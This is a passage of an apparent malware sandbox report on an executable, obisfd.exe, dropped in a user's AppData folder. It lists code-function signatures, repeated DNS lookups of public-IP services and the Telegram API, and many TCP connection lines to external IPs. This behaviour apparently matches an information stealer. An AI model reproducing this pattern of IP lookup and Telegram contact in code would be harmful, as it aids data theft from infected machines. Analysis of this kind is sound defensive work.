                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0069330Ah7_2_00693010
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00691FEAh7_2_00691CF0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006937D2h7_2_006934D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0069297Ah7_2_00692680
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00691192h7_2_00690E98
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0069165Ah7_2_00691360
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00692E42h7_2_00692B48
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00690802h7_2_00690508
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00690CCAh7_2_006909D0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00693C9Ah7_2_006939A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006924B3h7_2_006921B8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B6B91h7_2_006B68E8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BAD11h7_2_006BAA68
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B4021h7_2_006B3D78
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BC721h7_2_006BC478
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BEC49h7_2_006BE978
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BBA19h7_2_006BB770
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B3319h7_2_006B3070
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B7CF1h7_2_006B7A48
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BFA11h7_2_006BF740
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B6FE9h7_2_006B6D40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B9701h7_2_006B9458
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B89F9h7_2_006B8750
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BCFD1h7_2_006BCD28
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B48D1h7_2_006B4628
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BC2C9h7_2_006BC020
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B3BC9h7_2_006B3920
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B62E1h7_2_006B6038
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B55D9h7_2_006B5330
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BDCD9h7_2_006BDA30
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B92A9h7_2_006B9000
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BB5C1h7_2_006BB318
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BF0E1h7_2_006BEE10
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B5E89h7_2_006B5BE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BE7B1h7_2_006BE4E0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B85A1h7_2_006B82F8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B7899h7_2_006B75F0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BBE71h7_2_006BBBC8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B3771h7_2_006B34C8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BB169h7_2_006BAEC0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B5181h7_2_006B4ED8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BD881h7_2_006BD5D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BCB7Bh7_2_006BC8D0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B4479h7_2_006B41D0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BF579h7_2_006BF2A8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B8E51h7_2_006B8BA8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B8149h7_2_006B7EA0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B9B59h7_2_006B98B0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B5A31h7_2_006B5788
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BE1C5h7_2_006BDE88
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006BD429h7_2_006BD180
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B4D29h7_2_006B4A80
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B7441h7_2_006B7198
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 006B6739h7_2_006B6490
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_006E5F28
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_006E5F38
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_006E2B00
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_006E2AF9
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 193.122.6.168:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
